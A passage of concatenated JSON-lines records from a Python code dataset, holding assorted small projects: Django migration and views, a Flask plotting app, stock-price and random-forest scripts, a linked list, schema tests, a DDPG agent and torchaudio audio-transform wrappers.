stack=pipeline\")\n\napp.synth()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190241062","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('userprofile', '0005_auto_20150608_1133'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='payment',\n name='date',\n field=models.DateField(default=datetime.date(2015, 6, 22), help_text='The payment occoured on this date.', verbose_name='Date'),\n preserve_default=True,\n ),\n ]\n","sub_path":"userprofile/migrations/0006_auto_20150622_1745.py","file_name":"0006_auto_20150622_1745.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"411776941","text":"import flask\nfrom flask import Flask, render_template,url_for,request,send_file\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\napp = Flask(__name__)\nfile = pd.read_csv('2019.csv')\n@app.route('/')\ndef home():\n return render_template('home.html')\n@app.route('/Analysis')\ndef Analysis():\n file = pd.read_csv('2019.csv')\n plt.title('World happiness report 2019 based on score')\n y=file['Score']\n x=file['Country or region']\n N=len(x)\n\n plt.xticks(np.arange(0,N,2)) \n plt.scatter(x,y,color='yellow')\n\n plt.setp(plt.gca().get_xticklabels(),\n rotation=90,\n horizontalalignment='right',\n fontsize=10)\n return send_file('analysis.png')\n \n\nif __name__ == '__main__':\n app.run(debug=True, port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"326008108","text":"#!/usr/local/bin/python3\n\n\"\"\" Extracts current stock prices.\n Each output line will consist of:\n ||\n\"\"\"\n\nimport argparse\nimport os\n\nDELIMITER = '|'\nCAPS = [\n (100, '100-inf'),\n (75, '75-100'),\n (50, '50-75'),\n (40, '40-50'),\n (30, '30-40'),\n (25, '25-30'),\n (20, '20-25'),\n (15, '15-20'),\n (10, '10-15'),\n (5, '5-10'),\n (0, '0-5'),\n]\nMAX_DATE = '2013-10-25'\nMIN_DATE = '2013-10-18'\n\ndef get_class(v):\n for cap in CAPS:\n thresh, cls = cap\n if v > thresh:\n return cls\n assert False\n\ndef update_map(m, cls):\n if cls in m:\n m[cls] += 1\n else:\n m[cls] = 1\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--ticker_file', required=True)\n parser.add_argument('--price_dir', required=True)\n parser.add_argument('--price_file', required=True)\n args = parser.parse_args()\n\n with open(args.ticker_file, 'r') as fp:\n tickers = fp.read().splitlines()\n\n cls_map = dict()\n output_lines = []\n for i in range(len(tickers)):\n ticker = tickers[i]\n print('%d/%d: %s' % (i+1, len(tickers), ticker))\n price_file = '%s/%s.csv' % (args.price_dir, ticker)\n if not os.path.isfile(price_file):\n print('Price data does not exist for %s' % ticker)\n continue\n with open(price_file, 'r') as fp:\n lines = fp.read().splitlines()\n assert len(lines) > 0\n assert lines[0] == 'Date,Open,High,Low,Close,Volume,Adj Close'\n if len(lines) <= 1:\n print('No price data available for %s' % ticker)\n continue\n d, o, h, l, c, v, a = lines[1].split(',')\n assert d <= MAX_DATE\n if d < MIN_DATE:\n print('No recent price data available for %s' % ticker)\n continue\n price = float(a)\n cls = get_class(price)\n output_lines.append('%s%s%f%s%s'\n % (ticker, DELIMITER, price, DELIMITER, cls))\n update_map(cls_map, cls)\n\n print(cls_map)\n\n with open(args.price_file, 'w') as fp:\n for line in output_lines:\n print(line, file=fp)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"borabora/extract_price.py","file_name":"extract_price.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91158471","text":"from sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndef penaltyScore(cm):\n return 50*cm[0][1] + 10*cm[1][0]\n\n\ndf = pd.read_csv(\n 'https://github.com/wintonw/ISE364/raw/master/Midterm/project_data.csv')\ndf_obs = pd.read_csv(\n 'https://github.com/wintonw/ISE364/raw/master/Midterm/new_obs.csv')\n\n# V0 to binary\nV0 = pd.get_dummies(df['V0'], drop_first=True)\ndf.drop(['V0'], axis=1, inplace=True)\ndf = pd.concat([df, V0], axis=1)\n\n\n# split the data\nX = df.drop('target', axis=1)\ny = df.target\nX_train, X_Test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=12)\n\nrfc = RandomForestClassifier(n_estimators=1400, min_samples_split=2,\n min_samples_leaf=1, max_features='auto', max_depth=90, bootstrap=False, random_state=12)\nrfc.fit(X_train, y_train)\npredictions = rfc.predict(X_Test)\ncm = confusion_matrix(y_test, predictions)\nprint(cm)\nprint(classification_report(y_test, predictions))\n\nprint(penaltyScore(cm))\n\n# Format obs data for predictions\nV0_obs = pd.get_dummies(df_obs['V0'], drop_first=True)\ndf_obs.drop(['V0'], axis=1, inplace=True)\ndf_obs = pd.concat([df_obs, V0_obs], axis=1)\ndf_obs.rename(columns={\"B\": \"V0\"}, inplace=True)\n\n# Predict\nobs_predictions = rfc.predict(df_obs)\n\n# amend df\ndf_obs = pd.concat([df_obs, pd.Series(obs_predictions, name='target')], axis=1)\n\n# save to csv\ndf_obs.to_csv('predictions.csv')\n","sub_path":"Midterm/Midterm_WintonWong_ISE364/make_prediction.py","file_name":"make_prediction.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"353900877","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom .forms import SubscribeForm\nfrom .models import Subscriber\n\nfrom scripts import emailer, constants\n\n\ndef index(request):\n return render(request, 'subscribe/subscriptionForm.html')\n\n\ndef process(request):\n if request.method == 'POST':\n form = SubscribeForm(request.POST)\n if form.is_valid():\n phone_number = form.cleaned_data['phone_number']\n if(emailer.valid_phone_number(phone_number)):\n service_provider = form.cleaned_data['service_provider']\n if service_provider in constants.PROVIDER_TO_EMAIL:\n email = phone_number + constants.PROVIDER_TO_EMAIL[service_provider]\n subscriber = Subscriber(phone_number=phone_number, service_provider=service_provider, email=email)\n subscriber.save()\n emailer.send_subscription_response(email)\n return HttpResponseRedirect(reverse('status:index'))\n return render(request, 'subscribe/subscriptionForm.html', {'attempt':'true'})\n if request.method == 'GET':\n return render(request, 'subscribe/subscriptionForm.html')","sub_path":"subscribe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"192134327","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTranslate docutils node footnote formatting.\neach footnote start will processed with visit() and finished with depart()\n\"\"\"\n\nfrom docutils.nodes import Node\nfrom sphinxpapyrus.docxbuilder.translator import DocxTranslator\n\nnode_name = \"footnote\"\n\n\ndef visit(visitor: DocxTranslator, node: Node):\n \"\"\"Start processing footnote node\"\"\"\n assert isinstance(visitor, DocxTranslator)\n assert isinstance(node, Node)\n\n text = node.children[0].astext().strip()\n visitor.p = visitor._add_paragraph('[%s] ' % (text))\n \n\ndef depart(visitor: DocxTranslator, node: Node):\n \"\"\"Finish processing footnote node\"\"\"\n assert isinstance(visitor, DocxTranslator)\n assert isinstance(node, Node)\n\n visitor.p = None\n","sub_path":"sphinxpapyrus/docxbuilder/nodes/footnote.py","file_name":"footnote.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"365688662","text":"\n# Find the sum S of all the primes p less than or equal to 101.\n# Print out that sum.\n\n# Here is a fancy helper method to detect if a positive integer n is prime.\n\ndef is_prime(n):\n return (n > 1) and not any(n%i == 0 for i in range(2, n))\n\n# DEMO 1\n\ndef demo1():\n # Find all the primes from 1 to 11\n print(\"\\nHere are all the primes less than or equal to 11.\")\n for n in range(1, 12):\n if is_prime(n):\n print(n),\n\n\ndef solution():\n # Find the sum of all the prime up to and including 101.\n print(\"\\nHere is the sum of all the primes less than or equal to 101.\") # Labeled for the new prompt.\n b = [] # Sets an empty array for the incoming numbers\n for n in range(1, 102): # Iterates between 1 and 101.\n if is_prime(n): # If the program given finds a prime number\n b.append(n) # appends the prime numbers into the empty list\n print(str(sum(b))) # prints the sum of all the prime numbers less than or equal to 101\n\nif __name__ == \"__main__\":\n demo1()\n solution() # Runs the solution\n # solution()\n\n\n# Sample Output:\n# Here are all the primes less than or equal to 11.\n# 2 3 5 7 11\n#Finished","sub_path":"Python/Labs/Lab 1/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"439398726","text":"\n\nclass Node:\n def __init__(self, data=None, link=None):\n self.data = data\n self.link = link\n\n def get_data(self):\n return self.data\n\n def set_data(self, data):\n self.data = data\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert_front(self, data):\n _temp_node = Node(data)\n if not self.head:\n self.head = _temp_node\n else:\n temp = self.head\n _temp_node.link = temp\n self.head = _temp_node\n\n def append_back(self, data):\n _temp_node = Node(data)\n if not self.head:\n self.head = _temp_node\n else:\n temp = self.head\n while temp.link:\n temp = temp.link\n temp.link = _temp_node\n\n def display_list(self):\n start = self.head\n\n if not start:\n print(\"List Empty\")\n\n while start:\n print(\"{} -> \".format(start.data))\n start = start.link\n\n def reverse_list(self):\n print(\"Reverse List........\")\n first = self.head\n sec = first.link\n\n first.link = None\n\n while sec:\n temp = sec.link\n sec.link = first\n first = sec\n sec = temp\n\n self.head = first\n\nif __name__ == \"__main__\":\n l = LinkedList()\n l.insert_front(1)\n l.insert_front(2)\n l.append_back(3)\n l.insert_front(4)\n l.append_back(5)\n l.insert_front(6)\n l.display_list()\n l.reverse_list()\n l.display_list()\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430970627","text":"\"\"\"Checks if IntField is usable.\n\"\"\"\n\nimport pytest\n\nfrom python_schema import field, exception\n\n\ndef test_field_loads_data():\n \"\"\"Load data to IntField, check if we can access it. Try with different\n types on input (normalisation should kick in).\n \"\"\"\n schema = field.IntField('meaning_of_everything', allow_none=True)\n\n class AnObject:\n def __str__(self):\n return '6'\n\n values_to_check = [\n ('12', 12),\n (-1, -1),\n ('0', 0),\n (42, 42),\n (0, 0),\n (AnObject(), 6),\n (None, None),\n ]\n\n for value_before, value_after in values_to_check:\n schema.loads(value_before)\n\n assert schema.name == 'meaning_of_everything'\n assert schema == value_after\n assert schema.errors == []\n assert schema.as_python() == value_after\n assert schema.as_json() == value_after\n\n\ndef test_cases_when_normalisation_fails():\n \"\"\"Test checks if normalisation is not overcommitting itself.\n \"\"\"\n schema = field.IntField('meaning_of_everything', allow_none=False)\n\n values_to_check = [\n 'True',\n True,\n False,\n 'hello',\n '12.3.4.5',\n 13.4,\n '12.8',\n ]\n\n for value in values_to_check:\n with pytest.raises(exception.NormalisationError):\n schema.loads(value)\n\n assert schema.errors == \\\n [f'IntField cannot be populated with value: {value}']\n\n try:\n schema.loads(value)\n except exception.NormalisationError as err:\n assert schema.errors == \\\n [f'IntField cannot be populated with value: {value}']\n assert str(err) == \\\n f'IntField cannot be populated with value: {value}'\n\n\ndef test_cases_when_we_do_not_allow_nones():\n schema = field.IntField('meaning_of_everything', allow_none=False)\n\n with pytest.raises(exception.NormalisationError):\n schema.loads(None)\n\n try:\n schema.loads(None)\n except exception.NormalisationError as err:\n assert schema.errors == ['None is not allowed value']\n assert str(err) == 'None is not allowed value'\n","sub_path":"tests/test_integer_field.py","file_name":"test_integer_field.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"32631471","text":"import argparse\nfrom itertools import count\n\nimport os, sys, random\nimport numpy as np\nimport _pickle as pickle \n\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\n\nfrom utils.models import QNetwork, DeterministicPolicy\nfrom utils.ReplayBuffer import ReplayBuffer\nfrom algorithms import algorithms\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nclass DDPG(algorithms):\n\tdef __init__(self, args):\n\t\tsuper().__init__(args)\n\t\tstate_dim = self.env.observation_space.shape[0]\n\t\taction_dim = self.env.action_space.shape[0]\n\n\t\tself.actor = DeterministicPolicy(state_dim, action_dim, 64, self.env.action_space).to(device)\n\t\tself.actor_target = DeterministicPolicy(state_dim, action_dim, 64, self.env.action_space).to(device)\n\t\tself.actor_target.load_state_dict(self.actor.state_dict())\n\t\tself.actor_optimizer = optim.Adam(self.actor.parameters(), self.args.lr)\n\n\t\tself.critic = QNetwork(state_dim, action_dim, 64).to(device)\n\t\tself.critic_target = QNetwork(state_dim, action_dim, 64).to(device)\n\t\tself.critic_target.load_state_dict(self.critic.state_dict())\n\t\tself.critic_optimizer = optim.Adam(self.critic.parameters(), self.args.lr)\n\n\t\tself.replay_buffer = ReplayBuffer(self.args.capacity)\n\t\tself.num_critic_update_iteration = 0\n\t\tself.num_actor_update_iteration = 0\n\t\tself.num_training = 0\n\t\tself.global_steps = 0\n\n\t\tif self.args.last_episode > 0:\n\t\t\tself.load(self.args.last_episode)\n\n\tdef update(self):\n\t\tfor it in range(self.args.update_iteration):\n\t\t\t# sample from replay buffer\n\t\t\tx, y, u, r, d = self.replay_buffer.sample(self.args.batch_size)\n\t\t\tstate = torch.FloatTensor(x).to(device)\n\t\t\taction = torch.FloatTensor(u).to(device)\n\t\t\tnext_state = torch.FloatTensor(y).to(device)\n\t\t\tdone = torch.FloatTensor(d).to(device)\n\t\t\treward = torch.FloatTensor(r).to(device)\n\n\t\t\t# computer the target Q value\n\t\t\tnext_action, _, _ = self.actor_target.sample(next_state)\n\t\t\ttarget_Q = self.critic_target(next_state, next_action)\n\t\t\ttarget_Q = reward + ((1-done) * self.args.gamma * target_Q).detach()\n\n\t\t\t# get current Q estimate\n\t\t\tcurrent_Q = self.critic(state, action)\n\n\t\t\t# compute cirtic loss and update\n\t\t\tcritic_loss = F.mse_loss(current_Q, target_Q)\n\t\t\tself.critic_optimizer.zero_grad()\n\t\t\tcritic_loss.backward()\n\t\t\tself.critic_optimizer.step()\n\n\t\t\t# computer actor loss\n\t\t\tactor_action, _, _ = self.actor.sample(state)\n\t\t\tactor_loss = -self.critic(state, actor_action).mean()\n\t\t\tself.actor_optimizer.zero_grad()\n\t\t\tactor_loss.backward()\n\t\t\tself.actor_optimizer.step()\n\n\t\t\t# update target model \n\t\t\tfor param, target_param in zip(self.critic.parameters(), self.critic_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.args.tau * param.data + (1 - self.args.tau) * target_param.data)\n\n\t\t\tfor param, target_param in zip(self.actor.parameters(), self.actor_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.args.tau * param.data + (1 - self.args.tau) * target_param.data)\n\n\t\t\tself.num_actor_update_iteration += 1\n\t\t\tself.num_critic_update_iteration += 1\n\n\tdef train(self):\n\t\tfor i in range(self.args.max_episode):\n\t\t\tstate = self.env.reset()\n\t\t\tep_r = 0\n\t\t\tfor t in count():\n\t\t\t\taction, _, _ = self.actor.sample(torch.FloatTensor([state]).to(device))\n\t\t\t\taction = action.cpu().detach().numpy()[0]\n\n\t\t\t\tnext_state, reward, done, info = self.env.step(action)\n\t\t\t\tself.global_steps += 1\n\t\t\t\tep_r += reward\n\t\t\t\tself.replay_buffer.push((state, next_state, action, reward, np.float(done)))\n\t\t\t\tstate = next_state\n\n\t\t\t\tif done or t > self.args.max_length_trajectory:\n\t\t\t\t\tif i % self.args.print_log == 0:\n\t\t\t\t\t\tprint(\"Ep_i \\t {}, the ep_r is \\t{:0.2f}, the step is \\t{}, global_steps is {}\".format(i, ep_r, t, self.global_steps))\n\t\t\t\t\t\tself.evaluate(10, False)\n\t\t\t\t\tbreak\n\n\t\t\tif len(self.replay_buffer.storage) >= self.args.capacity - 1:\n\t\t\t\tself.update()\n\t\tself.save(i+1)\n\n\tdef evaluate(self, number = 1, render = True):\n\t\trewards = []\n\t\tfor _ in range(number):\n\t\t\ttotal_rews = 0\n\t\t\ttime_step = 0\n\t\t\tdone = False\n\t\t\tstate = self.env.reset()\n\t\t\twhile not done:\n\t\t\t\twith torch.no_grad():\n\t\t\t\t\t# use the mean action\n\t\t\t\t\t_, _, action = self.actor.sample(torch.FloatTensor([state]).to(device))\n\t\t\t\t\taction = action.cpu().detach().numpy()[0]\n\t\t\t\tif render:\n\t\t\t\t\tself.env.render()\n\t\t\t\tstate, reward, done, _ = self.env.step(action)\n\t\t\t\ttotal_rews += reward\n\t\t\t\ttime_step += 1\n\n\t\t\tif render:\n\t\t\t\tprint(\"total reward of this episode is \" + str(total_rews))\n\t\t\trewards.append(total_rews)\n\t\trewards = np.array(rewards)\n\t\tif not render:\n\t\t\tpickle.dump((self.global_steps, rewards), self.log_file)\n\t\tprint(\"mean reward {}, max reward {}\".format(rewards.mean(), rewards.max()))\n\n\tdef load(self, episode = None):\n\t\tfile_name = self.weights_file(episode)\n\t\tcheckpoint = torch.load(file_name)\n\t\tself.actor.load_state_dict(checkpoint['actor'])\n\t\tself.actor_target.load_state_dict(checkpoint['actor_target'])\n\t\tself.critic.load_state_dict(checkpoint['critic'])\n\t\tself.critic.load_state_dict(checkpoint['critic_target'])\n\t\tprint(\"successfully load model from \" + file_name)\n\n\tdef save(self, episode = None):\n\t\tfile_name = self.weights_file(episode)\n\t\ttorch.save({'actor' : self.actor.state_dict(),\n\t\t\t\t\t'critic' : self.critic.state_dict(),\n\t\t\t\t\t'actor_target' : self.actor_target.state_dict(),\n\t\t\t\t\t'critic_target' : self.critic_target.state_dict()}, file_name)\n\t\tprint(\"save model to \" + file_name)\n","sub_path":"DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"353521050","text":"\"\"\"\nThis module contains transformations to work with audio in its different representations like\naudio waveform, linear spectrogram, mel spectrogram.\n\"\"\"\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nfrom torch import Tensor, device\nimport torchaudio\nfrom torchaudio import functional as F\n\nfrom src.utils.hparams import HParams\n\n\n# TODO: compare using torchaudio.transforms vs torchaudio.functional (F)\n\n\ndef resample(waveforms: Tensor, orig_freq: int, new_freq: int) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.Resample().\n\n Args:\n waveforms (Tensor): audio waveform. Shape: [B, 1, L] where L is the number of times the waveform\n has been sampled and B is batch size.\n orig_freq (int)\n new_freq (int)\n\n Returns:\n waveform (Tensor): audio waveform: Shape: [B, 1, L'] where L' is the number of times the\n waveform has been sampled (after resampling) and B is batch size.\n \"\"\"\n assert len(waveforms.size()) == 3, \\\n \"Dimensions of waveforms should be 3: [B, 1, L], but found {}\".format(len(waveforms.size()))\n\n r = torchaudio.transforms.Resample(orig_freq, new_freq)\n return r(waveforms)\n\n\ndef wave_to_spectrogram(waveforms: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.Spectrogram().\n\n Args:\n waveforms (Tensor): audio waveform. Shape: [B, 1, L] where L is the number of times the waveform\n has been sampled and B is batch size.\n hp (HParams): parameters. Parameters needed are n_fft, win_length, hop_length and power.\n\n Returns:\n spectrogram (Tensor): spectrogram corresponding to waveform. Shape: [B, FREQ, FRAMES]\n where B is batch size and FREQ and FRAMES depends on the parameters hp.\n (See: https://pytorch.org/audio/transforms.html#spectrogram)\n \"\"\"\n assert len(waveforms.size()) == 3, \\\n \"Dimensions of waveforms should be 3: [B, 1, L], but found {}\".format(len(waveforms.size()))\n\n stype = 2 if hp.audio.spectrogram_type == 'power' else 1\n spectrogram = torchaudio.transforms.Spectrogram(n_fft=hp.audio.n_fft,\n win_length=hp.audio.win_length,\n hop_length=hp.audio.hop_length,\n power=stype).to(hp.device)\n return spectrogram(waveforms).squeeze(dim=1)\n\n\ndef spectrogram_to_wave(spectrogram: Tensor, hp: HParams, n_iter: int = 32) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.GriffinLim().\n\n Args:\n spectrogram (Tensor): spectrogram. Shape: [B, FREQ, FRAMES] where B is batch size.\n hp (HParams): parameters. Parameters needed are n_fft, win_length, hop_length and power.\n n_iter (int): number of iteration for phase recovery process.\n\n Returns:\n waveform (Tensor): audio waveform. Shape: [B, 1, L] L is the number of times the waveform\n has been sampled and B is batch size.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES], but found {}\".format(\n len(spectrogram.size()))\n\n stype = 2 if hp.audio.spectrogram_type == 'power' else 1\n griffinlim = torchaudio.transforms.GriffinLim(n_fft=hp.audio.n_fft,\n n_iter=n_iter,\n win_length=hp.audio.win_length,\n hop_length=hp.audio.hop_length,\n power=stype).to(hp.device)\n return griffinlim(spectrogram).unsqueeze(dim=1)\n\n\ndef spectrogram_to_melspectrogram(spectrogram: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.trnaforms.MelScale()\n\n Args:\n spectrogram (Tensor): spectrogram. Shape: [B, FREQ, FRAMES] where B is batch size.\n hp (HParams): parameters. Parameters needed are mel_channels and sample_rate.\n\n Returns:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size\n and N_MELS is the number of mel_channels.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES], but found {}\".format(\n len(spectrogram.size()))\n\n melscale = torchaudio.transforms.MelScale(n_mels=hp.audio.mel_channels,\n sample_rate=hp.audio.sample_rate).to(hp.device)\n return melscale(spectrogram)\n\n\ndef melspectrogram_to_spectrogram(melspectrogram: Tensor, hp: HParams, n_iter: int = 1000) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.InverseMelScale().\n\n Args:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size\n and N_MELS is the number of mel_channels.\n hp (HParams): parameters. Parameters needed are n_fft, mel_channels and sample_rate.\n n_iter (int): number of optimization iterations.\n\n Returns:\n spectrogram (Tensor): linear spectrogram. Shape: [B, FREQ, FRAMES] where B is batch size.\n \"\"\"\n assert len(melspectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, N_MELS, FRAMES], but found {}\".format(\n len(melspectrogram.size()))\n\n # n_stft = nº bins in spectrogram depending on n_fft, exactly n_fft // 2 + 1\n inversemelscale = torchaudio.transforms.InverseMelScale(n_stft=hp.audio.n_fft // 2 + 1,\n n_mels=hp.audio.mel_channels,\n sample_rate=hp.audio.sample_rate,\n max_iter=n_iter).to(hp.device)\n return inversemelscale(melspectrogram)\n\n\ndef wave_to_melspectrogram(waveform: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.MelSpectrogram().\n\n Args:\n waveform (Tensor): audio waveform. Shape: [B, 1, L] where B is batch size\n hp (HParams): parameters. Parameters needed are sample_rate, n_fft, win_length, hop_length\n and mel_channels.\n\n Returns:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size.\n \"\"\"\n assert len(waveform.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, 1, L], but found {}\".format(\n len(waveform.size()))\n\n melsprectrogram = torchaudio.transforms.MelSpectrogram(sample_rate=hp.audio.sample_rate,\n n_fft=hp.audio.n_fft,\n win_length=hp.audio.win_length,\n hop_length=hp.audio.hop_length,\n n_mels=hp.audio.mel_channels).to(hp.device)\n return melsprectrogram(waveform).squeeze(dim=1)\n\n\ndef melspectrogram_to_wave(melspectrogram: Tensor, hp: HParams, n_iter: int = 32) -> Tensor:\n r\"\"\"\n Composition of transforms.melspectrogram_to_spectrogram() and transforms.spectrogram_to_wave().\n\n Args:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size.\n hp (HParams): parameters.\n n_iter (int): number of iteration for phase recovery process.\n\n Returns:\n waveform (Tensor): audio waveform. Shape: [B, 1, L] where B is batch size.\n \"\"\"\n assert len(melspectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, N_MELS, FRAMES], but found {}\".format(\n len(melspectrogram.size()))\n\n spectrogram = melspectrogram_to_spectrogram(melspectrogram, hp)\n waveform = spectrogram_to_wave(spectrogram, hp, n_iter)\n return waveform\n\n\ndef amplitude_to_db(spectrogram: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.AmplitudeToDB().\n\n Args:\n spectrogram (Tensor): spectrogram in the power/amplitude scale.\n Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n hp (HParams): parameters. Parameters needed are power.\n\n Returns:\n spectrogram (Tensor): spectrogram in decibel scale.\n Shape: Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES], \" \\\n \"but found {}\".format(len(spectrogram.size()))\n\n stype = 'power' if hp.audio.spectrogram_type == 'power' else 'magnitude'\n amplitudetodb = torchaudio.transforms.AmplitudeToDB(stype=stype).to(hp.device)\n return amplitudetodb(spectrogram)\n\n\ndef db_to_amplitude(spectrogram: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.functional.DB_to_amplitude().\n\n Args:\n spectrogram (Tensor): spectrogram in the decibel scale.\n Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n hp (HParams): parameters. Parameters needed are power.\n\n Returns:\n spectrogram (Tensor): spectrogram in power/amplitude scale.\n Shape: Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES], \" \\\n \"but found {}\".format(len(spectrogram.size()))\n\n # power_exp calculated according to torchaudio.functional.DB_to_amplitude docs\n power_exp = 1 if hp.audio.spectrogram_type == 'power' else 0.5\n return F.DB_to_amplitude(spectrogram, ref=1, power=power_exp)\n\n\ndef plot_wave(waveforms: Tensor, hp: HParams) -> None:\n r\"\"\"Plots the amplitude waveforms.\n\n Args:\n waveforms (Tensor): list of audio waveforms. Shape: [B, 1, L] where L is the number\n of times the waveform has been sampled and B is batch size.\n hp (HParams): parameters. Parameters needed are sample_rate.\n \"\"\"\n assert len(waveforms.size()) == 3, \\\n \"Dimensions of waveforms should be 3, found {}\".format(len(waveforms.size()))\n\n for idx, waveform in enumerate(waveforms):\n print(\"Waveform {}, shape: {}\".format(idx, waveform.size()))\n print(\"Waveform {}, Sample rate: {}\".format(idx, hp.audio.sample_rate))\n\n n_waveforms = waveforms.shape[0]\n # In case the waveforms tensor is in the GPU\n waveforms = waveforms.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_waveforms):\n fig.add_subplot(n_waveforms, 1, i + 1)\n plt.plot(waveforms[i].flatten(), alpha=0.8)\n plt.xlabel(\"Time (samples)\")\n plt.ylabel(\"Amplitude\")\n plt.show()\n\n\ndef plot_spectrogram(spectrogram: Tensor, hp: HParams) -> None:\n r\"\"\"Plots spectrogram without information in x-axis and y-axis.\n\n Args:\n spectrogram (Tensor): spectrogram. Shape: [B, FREQ, FRAMES].\n hp (HParams): parameters.\n\n .. Note:\n This function plots the spectrogram without axis values.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectogram should be 3, found {}\".format(len(spectrogram.size()))\n\n n_spectrograms = spectrogram.shape[0]\n # In case the spectrogram tensor is in the GPU\n spectrogram = spectrogram.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_spectrograms):\n fig.add_subplot(n_spectrograms, 1, i + 1)\n plt.imshow(spectrogram[i].detach().to('cpu'), origin='lower', interpolation=\"none\")\n plt.axis('off')\n plt.show()\n\n\ndef plot_melspectrogram(melspectrogram: Tensor, hp: HParams) -> None:\n r\"\"\"Plots melspectrogram without information in x-axis and y-axis.\n\n Args:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES].\n hp (HParams): parameters.\n\n .. Note:\n This function plots the melspectrogram without axis values.\n \"\"\"\n assert len(melspectrogram.size()) == 3, \\\n \"Dimensions of melspectogram should be 3, found {}\".format(len(melspectrogram.size()))\n\n n_melspectrograms = melspectrogram.shape[0]\n # In case the spectrogram tensor is in the GPU\n melspectrogram = melspectrogram.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_melspectrograms):\n fig.add_subplot(n_melspectrograms, 1, i + 1)\n plt.imshow(melspectrogram[i], origin='lower', interpolation=\"none\")\n plt.axis('off')\n plt.show()\n\n\ndef save_spectrogram(filepath: str, spectrogram: Tensor, hp: HParams) -> None:\n r\"\"\"Saves spectrogram as an image.\n\n Args:\n filepath (str): path where the spectrogram will be saved.\n spectrogram (Tensor): 